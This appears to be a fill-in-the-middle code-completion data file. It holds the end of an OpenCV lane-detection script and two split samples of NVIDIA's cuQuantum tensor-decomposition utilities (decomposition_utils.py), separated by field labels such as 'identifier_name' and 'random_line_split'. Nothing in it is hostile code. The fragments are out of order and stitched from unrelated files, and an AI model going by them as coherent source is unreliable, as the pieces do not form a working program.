#testing
output2 = cv2.resize(out_img,(320, 180), interpolation = cv2.INTER_AREA)
#testing ends
cv2.fillPoly(final_out_img,np.int_([pts]),(0,255,0))
#cv2.imwrite('./test_images/test.jpg',combined*255)
newwarp = cv2.warpPerspective(final_out_img, Minv, (image.shape[1], image.shape[0]))
result = cv2.addWeighted(final_img, 1, newwarp, 0.3, 0)
vis = np.zeros((720, 1280 ,3),dtype=np.uint8)
vis[:720, :1280,:] = result
ltext = "left Curvature(m): " + str(round(left_curved,3))
rtext = "right Curvature(m): " + str(round(right_curved,3))
cent_out = round((left_side_points_mean + right_side_points_mean)/2,3)
distance_from_center = round(abs(img_size[0]/2 - cent_out)*xm_per_pixel,3)
cent = "Vehicle is left from center(m): " + str(distance_from_center)
cv2.putText(result,ltext,(200,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,rtext,(750,100),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(result,cent,(350,200),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
#cv2.imshow('result',result)
output1 = cv2.resize(combined*255,(320, 180), interpolation = cv2.INTER_AREA)
vis[:180, 0:320,:] = np.dstack([output1,output1,output1])
vis[:180, 320:640,:] = output2
vis[:180, 640:960,:] = output3
vis[:180, 960:1280,:] = output4
cv2.putText(vis,ltext,(200,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,rtext,(750,210),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.putText(vis,cent,(350,250),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255),5,cv2.LINE_4)
cv2.imshow('result',vis)
result1.write(result)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
result1.release()
cv2.destroyAllWindows() | mag_thresh | identifier_name |
decomposition_utils.py | # Copyright (c) 2023, NVIDIA CORPORATION & AFFILIATES
#
# SPDX-License-Identifier: BSD-3-Clause
"""
A collection of utility functions for decomposition.
"""
import logging
import numpy
from . import einsum_parser
from . import formatters
from . import tensor_wrapper
from . import typemaps
from . import utils
from .. import cutensornet as cutn
from .. import memory
DECOMPOSITION_DTYPE_NAMES = ('float32', 'float64', 'complex64', 'complex128')
#TODO: auto generate the maps below
PARTITION_MAP = {None: cutn.TensorSVDPartition.NONE,
'U': cutn.TensorSVDPartition.US,
'V': cutn.TensorSVDPartition.SV,
'UV': cutn.TensorSVDPartition.UV_EQUAL}
NORMALIZATION_MAP = {None: cutn.TensorSVDNormalization.NONE,
'L1': cutn.TensorSVDNormalization.L1,
'L2': cutn.TensorSVDNormalization.L2,
'LInf': cutn.TensorSVDNormalization.LINF}
SVD_ALGORITHM_MAP = {'gesvd': cutn.TensorSVDAlgo.GESVD,
'gesvdj': cutn.TensorSVDAlgo.GESVDJ,
'gesvdp': cutn.TensorSVDAlgo.GESVDP,
'gesvdr': cutn.TensorSVDAlgo.GESVDR}
SVD_ALGORITHM_MAP_TO_STRING = dict((val, key) for key, val in SVD_ALGORITHM_MAP.items())
SVD_METHOD_CONFIG_MAP = {'abs_cutoff': cutn.TensorSVDConfigAttribute.ABS_CUTOFF,
'rel_cutoff': cutn.TensorSVDConfigAttribute.REL_CUTOFF,
'partition': cutn.TensorSVDConfigAttribute.S_PARTITION,
'normalization': cutn.TensorSVDConfigAttribute.S_NORMALIZATION,
'algorithm': cutn.TensorSVDConfigAttribute.ALGO}
SVD_INFO_MAP = {'full_extent': cutn.TensorSVDInfoAttribute.FULL_EXTENT,
'reduced_extent': cutn.TensorSVDInfoAttribute.REDUCED_EXTENT,
'discarded_weight': cutn.TensorSVDInfoAttribute.DISCARDED_WEIGHT,
'algorithm': cutn.TensorSVDInfoAttribute.ALGO}
def compute_combined_size(size_dict, modes):
"""
Given the modes, compute the product of all extents using information in size_dict.
"""
size = 1
for mode in modes:
size *= size_dict[mode]
return size
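# A minimal illustration with hypothetical values: for size_dict = {'a': 2, 'b': 3, 'c': 4},
# compute_combined_size(size_dict, 'ab') returns 6 and compute_combined_size(size_dict, 'abc')
# returns 24; `modes` can be any iterable of labels that appear in size_dict.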
def parse_decomposition_subscripts(subscripts): | Parse decomposition expression in string format, retaining ellipses if present.
"""
input_modes, *output_modes = subscripts.split("->")
if not output_modes:
raise ValueError("Output modes must be explicitly specified for decomposition")
if len(output_modes) > 1:
raise ValueError("subscripts must contain only 1 ->")
input_modes = input_modes.split(",")
output_modes = output_modes[0].split(",")
if len(output_modes) != 2:
raise ValueError("subscripts must specify the modes for both left and right tensors")
return input_modes, output_modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
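# A worked example with hypothetical values: decomposing a tensor with modes 'ij' into
# 'ik' and 'kj' (shared mode 'k') with size_dict = {'i': 4, 'j': 6} yields a maximal mid
# extent of min(4, 6) = 4, the same bound as for the SVD of a 4 x 6 matrix.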
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{cutn.TensorSVDConfigAttribute.ALGO_PARAMS}' has been set to {algo_params}.")
def get_svd_info_dict(handle, svd_info):
"""
Parse the information in SVDInfo in a dictionary object.
"""
info = dict()
for key, attr in SVD_INFO_MAP.items():
info[key] = get_svd_config_info_scalar_attr(handle, 'info', svd_info, attr).item()
svd_algorithm = info['algorithm']
algo_status = get_svd_config_info_scalar_attr(handle, 'info', svd_info, cutn.TensorSVDInfoAttribute.ALGO_STATUS, svd_algorithm=svd_algorithm)
info['algorithm'] = SVD_ALGORITHM_MAP_TO_STRING[svd_algorithm]
if algo_status is not None:
for name in algo_status.dtype.names:
key = info['algorithm'] + f'_{name}'
info[key] = algo_status[name].item()
return info
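# For illustration only: the returned dictionary always contains the keys listed in
# SVD_INFO_MAP, e.g. {'full_extent': 8, 'reduced_extent': 4, 'discarded_weight': 0.0,
# 'algorithm': 'gesvd'} (hypothetical values). When the algorithm is gesvdj or gesvdp,
# the algorithm-status fields reported by the library are appended as extra entries
# whose keys are prefixed with the algorithm name (e.g. 'gesvdj_<field>').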
def parse_decompose_operands_options(options, wrapped_operands, allowed_dtype_names=None):
"""
Given initially wrapped tensors and network options, wrap the operands to device and create an internal NetworkOptions object.
If cutensornet library handle is not provided in `options`, one will be created in the internal options.
"""
device_id = utils.get_network_device_id(wrapped_operands)
logger = logging.getLogger() if options.logger is None else options.logger
operands_location = 'cuda'
if device_id is None:
operands_location = 'cpu'
device_id = options.device_id
logger.info(f"Begin transferring input data from host to device {device_id}")
wrapped_operands = tensor_wrapper.to(wrapped_operands, device_id)
logger.info("Input data transfer finished")
# initialize handle once if not provided
if options.handle is not None:
own_handle = False
handle = options.handle
else:
own_handle = True
with utils.device_ctx(device_id):
handle = cutn.create()
dtype_name = utils.get_operands_dtype(wrapped_operands)
if allowed_dtype_names is not None and dtype_name not in allowed_dtype_names:
raise ValueError(f"dtype {dtype_name} not supported")
compute_type = options.compute_type if options.compute_type is not None else typemaps.NAME_TO_COMPUTE_TYPE[dtype_name]
package = utils.get_operands_package(wrapped_operands)
allocator = options.allocator if options.allocator is not None else memory._MEMORY_MANAGER[package](device_id, logger)
internal_options = options.__class__(device_id=device_id,
logger=logger,
handle=handle,
blocking=options.blocking,
compute_type=compute_type,
memory_limit=options.memory_limit,
allocator=allocator)
return wrapped_operands, internal_options, own_handle, operands_location
def allocate_and_set_workspace(handle, allocator, workspace_desc, pref, mem_space, workspace_kind, device_id, stream, stream_ctx, logger, task_name=''):
"""
Allocate and set the workspace in the workspace descriptor.
"""
workspace_size = cutn.workspace_get_memory_size(handle, workspace_desc, pref, mem_space, workspace_kind)
# Allocate and set workspace
if mem_space == cutn.Memspace.DEVICE:
with utils.device_ctx(device_id), stream_ctx:
try:
logger.debug(f"Allocating device memory for {task_name}")
workspace_ptr = allocator.memalloc(workspace_size)
except TypeError as e:
message = "The method 'memalloc' in the allocator object must conform to the interface in the "\
"'BaseCUDAMemoryManager' protocol."
raise TypeError(message) from e
logger.debug(f"Finished allocating device memory of size {formatters.MemoryStr(workspace_size)} for decomposition in the context of stream {stream}.")
device_ptr = utils.get_ptr_from_memory_pointer(workspace_ptr)
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, device_ptr, workspace_size)
logger.debug(f"The workspace memory (device pointer = {device_ptr}) has been set in the workspace descriptor.")
return workspace_ptr
elif workspace_size != 0:
# host workspace
logger.debug(f"Allocating host memory for {task_name}")
workspace_host = numpy.empty(workspace_size, dtype=numpy.int8)
logger.debug(f"Finished allocating host memory of size {formatters.MemoryStr(workspace_size)} for decomposition.")
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, workspace_host.ctypes.data, workspace_size)
logger.debug(f"The workspace memory (host pointer = {workspace_host.ctypes.data}) has been set in the workspace descriptor.")
return workspace_host
else:
return None
def _destroy_tensor_descriptors(desc_tensors):
for t in desc_tensors:
if t is not None:
cutn.destroy_tensor_descriptor(t)
def create_operands_and_descriptors(handle, wrapped_operands, size_dict, inputs, outputs, mid_extent, method, device_id, stream_ctx, logger):
"""
Create empty tensor operands and corresponding tensor descriptors for a decomposition problem.
"""
# Create input tensor descriptors, output operands and output tensor descriptors
output_class = wrapped_operands[0].__class__
dtype_name = wrapped_operands[0].dtype
# Compute extents for the outputs
shared_mode_out = list(set(outputs[0]) & set(outputs[1]))[0]
output_extents = [tuple(size_dict[m] if m != shared_mode_out else mid_extent for m in modes) for modes in outputs]
logger.debug("Creating input tensor descriptors.")
input_tensor_descriptors = []
output_tensor_descriptors = []
try:
for (t, modes) in zip(wrapped_operands, inputs):
input_tensor_descriptors.append(t.create_tensor_descriptor(handle, modes))
logger.debug("The input tensor descriptors have been created.")
# Create the output in the context of the current stream to work around a performance issue with CuPy's memory pool.
logger.debug("Beginning output tensors and descriptors creation...")
s = None
s_ptr = 0
output_operands = []
with utils.device_ctx(device_id):
for extent, tensor_modes in zip(output_extents, outputs):
operand = utils.create_empty_tensor(output_class, extent, dtype_name, device_id, stream_ctx)
output_operands.append(operand)
output_tensor_descriptors.append(operand.create_tensor_descriptor(handle, tensor_modes))
if hasattr(method, 'partition') and method.partition is None:
if dtype_name in ['float32', 'complex64']:
s_dtype_name = 'float32'
elif dtype_name in ['float64', 'complex128']:
s_dtype_name = 'float64'
else:
raise ValueError(f"{dtype_name} data type not supported")
s = utils.create_empty_tensor(output_class, (mid_extent, ), s_dtype_name, device_id, stream_ctx)
s_ptr = s.data_ptr
logger.debug("The output tensors and descriptors have been created.")
except:
_destroy_tensor_descriptors(input_tensor_descriptors)
_destroy_tensor_descriptors(output_tensor_descriptors)
raise
return input_tensor_descriptors, output_operands, output_tensor_descriptors, s, s_ptr
def get_return_operand_data(tensor, target_location):
"""
Given wrapped tensors, fetch the return operands based on target location.
"""
if tensor is None: # potentially for s
return tensor
if target_location == 'cpu':
return tensor.to('cpu')
else: # already on device
return tensor.tensor | """ | random_line_split |
decomposition_utils.py | # Copyright (c) 2023, NVIDIA CORPORATION & AFFILIATES
#
# SPDX-License-Identifier: BSD-3-Clause
"""
A collection of utility functions for decomposition.
"""
import logging
import numpy
from . import einsum_parser
from . import formatters
from . import tensor_wrapper
from . import typemaps
from . import utils
from .. import cutensornet as cutn
from .. import memory
DECOMPOSITION_DTYPE_NAMES = ('float32', 'float64', 'complex64', 'complex128')
#TODO: auto generate the maps below
PARTITION_MAP = {None: cutn.TensorSVDPartition.NONE,
'U': cutn.TensorSVDPartition.US,
'V': cutn.TensorSVDPartition.SV,
'UV': cutn.TensorSVDPartition.UV_EQUAL}
NORMALIZATION_MAP = {None: cutn.TensorSVDNormalization.NONE,
'L1': cutn.TensorSVDNormalization.L1,
'L2': cutn.TensorSVDNormalization.L2,
'LInf': cutn.TensorSVDNormalization.LINF}
SVD_ALGORITHM_MAP = {'gesvd': cutn.TensorSVDAlgo.GESVD,
'gesvdj': cutn.TensorSVDAlgo.GESVDJ,
'gesvdp': cutn.TensorSVDAlgo.GESVDP,
'gesvdr': cutn.TensorSVDAlgo.GESVDR}
SVD_ALGORITHM_MAP_TO_STRING = dict((val, key) for key, val in SVD_ALGORITHM_MAP.items())
SVD_METHOD_CONFIG_MAP = {'abs_cutoff': cutn.TensorSVDConfigAttribute.ABS_CUTOFF,
'rel_cutoff': cutn.TensorSVDConfigAttribute.REL_CUTOFF,
'partition': cutn.TensorSVDConfigAttribute.S_PARTITION,
'normalization': cutn.TensorSVDConfigAttribute.S_NORMALIZATION,
'algorithm': cutn.TensorSVDConfigAttribute.ALGO}
SVD_INFO_MAP = {'full_extent': cutn.TensorSVDInfoAttribute.FULL_EXTENT,
'reduced_extent': cutn.TensorSVDInfoAttribute.REDUCED_EXTENT,
'discarded_weight': cutn.TensorSVDInfoAttribute.DISCARDED_WEIGHT,
'algorithm': cutn.TensorSVDInfoAttribute.ALGO}
def compute_combined_size(size_dict, modes):
"""
Given the modes, compute the product of all extents using information in size_dict.
"""
size = 1
for mode in modes:
size *= size_dict[mode]
return size
def parse_decomposition_subscripts(subscripts):
"""
Parse decomposition expression in string format, retaining ellipses if present.
"""
input_modes, *output_modes = subscripts.split("->")
if not output_modes:
raise ValueError("Output modes must be explicitly specified for decomposition")
if len(output_modes) > 1:
raise ValueError("subscripts must contain only 1 ->")
input_modes = input_modes.split(",")
output_modes = output_modes[0].split(",")
if len(output_modes) != 2:
raise ValueError("subscripts must specify the modes for both left and right tensors")
return input_modes, output_modes
def compute_mid_extent(size_dict, inputs, outputs):
"""
Compute the expected mid extent given a size_dict and the modes for both inputs and outputs.
"""
size_dict = size_dict.copy() # this func will modify it in place
left_output = set(outputs[0])
right_output = set(outputs[1])
shared_mode_out = set(left_output) & set(right_output)
if len(shared_mode_out) !=1:
raise ValueError(f"Expect one shared mode in the output tensors, found {len(shared_mode_out)}")
left_output -= shared_mode_out
right_output -= shared_mode_out
for _input in inputs:
left_extent = right_extent = remaining_extent = 1
left_modes = set()
right_modes = set()
for mode in _input:
extent = size_dict[mode]
if mode in left_output:
left_extent *= extent
left_modes.add(mode)
elif mode in right_output:
right_extent *= extent
right_modes.add(mode)
else:
remaining_extent *= extent
if right_extent * remaining_extent < left_extent:
# update left modes
left_mode_collapsed = left_modes.pop()
size_dict[left_mode_collapsed] = right_extent * remaining_extent
left_output -= left_modes
elif left_extent * remaining_extent < right_extent:
# update right modes
right_mode_collapsed = right_modes.pop()
size_dict[right_mode_collapsed] = left_extent * remaining_extent
right_output -= right_modes
left_extent = compute_combined_size(size_dict, left_output)
right_extent = compute_combined_size(size_dict, right_output)
return min(left_extent, right_extent)
def parse_decomposition(subscripts, *operands):
"""
Parse the generalized decomposition expression in string formats (unicode strings supported).
The modes for the outputs must be specified.
Returns wrapped operands, mapped inputs and output, size dictionary based on internal mode numbers,
the forward as well as the reverse mode maps, and the largest mid extent expected for the decomposition.
"""
inputs, outputs = parse_decomposition_subscripts(subscripts)
num_operand, num_input = len(operands), len(inputs)
if num_operand != num_input:
message = f"""Operand-term mismatch. The number of operands ({num_operand}) must match the number of inputs ({num_input}) specified in the decomposition expression."""
raise ValueError(message)
morpher = einsum_parser.select_morpher(False)
# First wrap operands.
operands = tensor_wrapper.wrap_operands(operands)
inputs = list(einsum_parser.parse_single(_input) for _input in inputs)
outputs = list(einsum_parser.parse_single(_output) for _output in outputs)
ellipses_input = any(Ellipsis in _input for _input in inputs)
num_ellipses_output = sum(Ellipsis in _output for _output in outputs)
if num_ellipses_output > 1:
raise ValueError(f"Ellipses found in {num_ellipses_output} output terms, only allowed in one at most.")
if ellipses_input:
if num_input == 1 and num_ellipses_output == 0:
raise ValueError("tensor.decompose does not support reduction operations")
einsum_parser.check_ellipses(inputs+outputs, morpher)
else:
if num_ellipses_output != 0:
raise ValueError("Invalid ellipsis specification. The output terms contain ellipsis while none of the input terms do.")
einsum_parser.check_einsum_with_operands(inputs, operands, morpher)
# Map data to ordinals for cutensornet.
num_extra_labels = max(len(o.shape) for o in operands) if ellipses_input else 0
all_modes, _, mode_map_user_to_ord, mode_map_ord_to_user, label_end = einsum_parser.map_modes(inputs + outputs, None, num_extra_labels, morpher)
mapper = einsum_parser.ModeLabelMapper(mode_map_ord_to_user)
mapping_morpher = einsum_parser.select_morpher(False, mapper)
# Replace ellipses with concrete labels
if ellipses_input:
if num_input == 1:
# For tensor.decompose only
n = len(operands[0].shape) - (len(inputs[0]) -1)
else:
num_implicit_modes = set()
for i, o in enumerate(operands):
_input = all_modes[i]
if Ellipsis not in _input:
continue
n = len(o.shape) - (len(_input) - 1)
assert n >= 0, "Internal error"
num_implicit_modes.add(n)
if len(num_implicit_modes) != 1:
#NOTE: Although we can allow ellipsis denoting different number of modes,
# here we disable it due to limited use case if any and potential confusion due to implicit specification.
raise ValueError(f"Ellipsis for all operands must refer to equal number of modes, found {num_implicit_modes}")
n = num_implicit_modes.pop()
ellipses_modes = tuple(range(label_end-n, label_end))
for i, _modes in enumerate(all_modes):
if Ellipsis not in _modes:
continue
s = _modes.index(Ellipsis)
all_modes[i] = _modes[:s] + ellipses_modes + _modes[s+1:]
inputs = all_modes[:num_input]
outputs = all_modes[num_input:]
if num_input == 1:
contracted_modes_output = set(einsum_parser.infer_output_mode_labels(outputs))
if contracted_modes_output != set(inputs[0]):
raise ValueError("The contracted outcome from the right hand side of the expression does not match the input")
# Create mode-extent map based on internal mode numbers.
size_dict = einsum_parser.create_size_dict(inputs, operands)
# Compute the maximally allowed mid extent
mid_extent = compute_mid_extent(size_dict, inputs, outputs)
return operands, inputs, outputs, size_dict, mode_map_user_to_ord, mode_map_ord_to_user, mid_extent
def get_svd_config_info_scalar_attr(handle, obj_type, obj, attr, svd_algorithm=None):
"""
Get the data for given attribute of SVDConfig or SVDInfo.
"""
if obj_type == 'config':
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
return None
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_config_get_attribute
elif obj_type == 'info':
if attr != cutn.TensorSVDInfoAttribute.ALGO_STATUS:
dtype = cutn.tensor_svd_info_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDP):
return None
dtype = cutn.tensor_svd_algo_status_get_dtype(svd_algorithm)
getter = cutn.tensor_svd_info_get_attribute
else:
raise ValueError("object type must be either config or info")
data = numpy.empty((1,), dtype=dtype)
getter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
return data
def set_svd_config_scalar_attr(handle, obj, attr, data, svd_algorithm=None):
"""
Set the data for given attribute of SVDConfig.
"""
setter = cutn.tensor_svd_config_set_attribute
if attr != cutn.TensorSVDConfigAttribute.ALGO_PARAMS:
dtype = cutn.tensor_svd_config_get_attribute_dtype(attr)
else:
if svd_algorithm not in (cutn.TensorSVDAlgo.GESVDJ, cutn.TensorSVDAlgo.GESVDR):
raise ValueError(f"Algorithm specific parameters not supported for {svd_algorithm}")
dtype = cutn.tensor_svd_algo_params_get_dtype(svd_algorithm)
if not isinstance(data, numpy.ndarray):
data = numpy.asarray(data, dtype=dtype)
setter(handle, obj, attr, data.ctypes.data, data.dtype.itemsize)
def parse_svd_config(handle, svd_config, svd_method, logger=None):
"""
Given an SVDMethod object, set the corresponding attributes in the SVDConfig.
"""
svd_algorithm = None
for method_attr, attr in SVD_METHOD_CONFIG_MAP.items():
data = getattr(svd_method, method_attr)
if method_attr == 'partition':
data = PARTITION_MAP[data]
elif method_attr == 'normalization':
data = NORMALIZATION_MAP[data]
elif method_attr == 'algorithm':
svd_algorithm = data = SVD_ALGORITHM_MAP[data]
set_svd_config_scalar_attr(handle, svd_config, attr, data)
if logger is not None:
logger.info(f"The SVDConfig attribute '{method_attr}' has been set to {data}.")
algo_params = svd_method._get_algo_params()
if algo_params is not None:
set_svd_config_scalar_attr(handle, svd_config, cutn.TensorSVDConfigAttribute.ALGO_PARAMS, algo_params, svd_algorithm=svd_algorithm)
if logger is not None:
logger.info(f"The SVDConfig attribute '{cutn.TensorSVDConfigAttribute.ALGO_PARAMS}' has been set to {algo_params}.")
def get_svd_info_dict(handle, svd_info):
"""
Parse the information in SVDInfo in a dictionary object.
"""
info = dict()
for key, attr in SVD_INFO_MAP.items():
info[key] = get_svd_config_info_scalar_attr(handle, 'info', svd_info, attr).item()
svd_algorithm = info['algorithm']
algo_status = get_svd_config_info_scalar_attr(handle, 'info', svd_info, cutn.TensorSVDInfoAttribute.ALGO_STATUS, svd_algorithm=svd_algorithm)
info['algorithm'] = SVD_ALGORITHM_MAP_TO_STRING[svd_algorithm]
if algo_status is not None:
for name in algo_status.dtype.names:
key = info['algorithm'] + f'_{name}'
info[key] = algo_status[name].item()
return info
def parse_decompose_operands_options(options, wrapped_operands, allowed_dtype_names=None):
"""
Given initially wrapped tensors and network options, wrap the operands to device and create an internal NetworkOptions object.
If cutensornet library handle is not provided in `options`, one will be created in the internal options.
"""
device_id = utils.get_network_device_id(wrapped_operands)
logger = logging.getLogger() if options.logger is None else options.logger
operands_location = 'cuda'
if device_id is None:
operands_location = 'cpu'
device_id = options.device_id
logger.info(f"Begin transferring input data from host to device {device_id}")
wrapped_operands = tensor_wrapper.to(wrapped_operands, device_id)
logger.info("Input data transfer finished")
# initialize handle once if not provided
if options.handle is not None:
own_handle = False
handle = options.handle
else:
own_handle = True
with utils.device_ctx(device_id):
handle = cutn.create()
dtype_name = utils.get_operands_dtype(wrapped_operands)
if allowed_dtype_names is not None and dtype_name not in allowed_dtype_names:
raise ValueError(f"dtype {dtype_name} not supported")
compute_type = options.compute_type if options.compute_type is not None else typemaps.NAME_TO_COMPUTE_TYPE[dtype_name]
package = utils.get_operands_package(wrapped_operands)
allocator = options.allocator if options.allocator is not None else memory._MEMORY_MANAGER[package](device_id, logger)
internal_options = options.__class__(device_id=device_id,
logger=logger,
handle=handle,
blocking=options.blocking,
compute_type=compute_type,
memory_limit=options.memory_limit,
allocator=allocator)
return wrapped_operands, internal_options, own_handle, operands_location
def allocate_and_set_workspace(handle, allocator, workspace_desc, pref, mem_space, workspace_kind, device_id, stream, stream_ctx, logger, task_name=''):
"""
Allocate and set the workspace in the workspace descriptor.
"""
workspace_size = cutn.workspace_get_memory_size(handle, workspace_desc, pref, mem_space, workspace_kind)
# Allocate and set workspace
if mem_space == cutn.Memspace.DEVICE:
with utils.device_ctx(device_id), stream_ctx:
try:
logger.debug(f"Allocating device memory for {task_name}")
workspace_ptr = allocator.memalloc(workspace_size)
except TypeError as e:
message = "The method 'memalloc' in the allocator object must conform to the interface in the "\
"'BaseCUDAMemoryManager' protocol."
raise TypeError(message) from e
logger.debug(f"Finished allocating device memory of size {formatters.MemoryStr(workspace_size)} for decomposition in the context of stream {stream}.")
device_ptr = utils.get_ptr_from_memory_pointer(workspace_ptr)
cutn.workspace_set_memory(handle, workspace_desc, mem_space, workspace_kind, device_ptr, workspace_size)
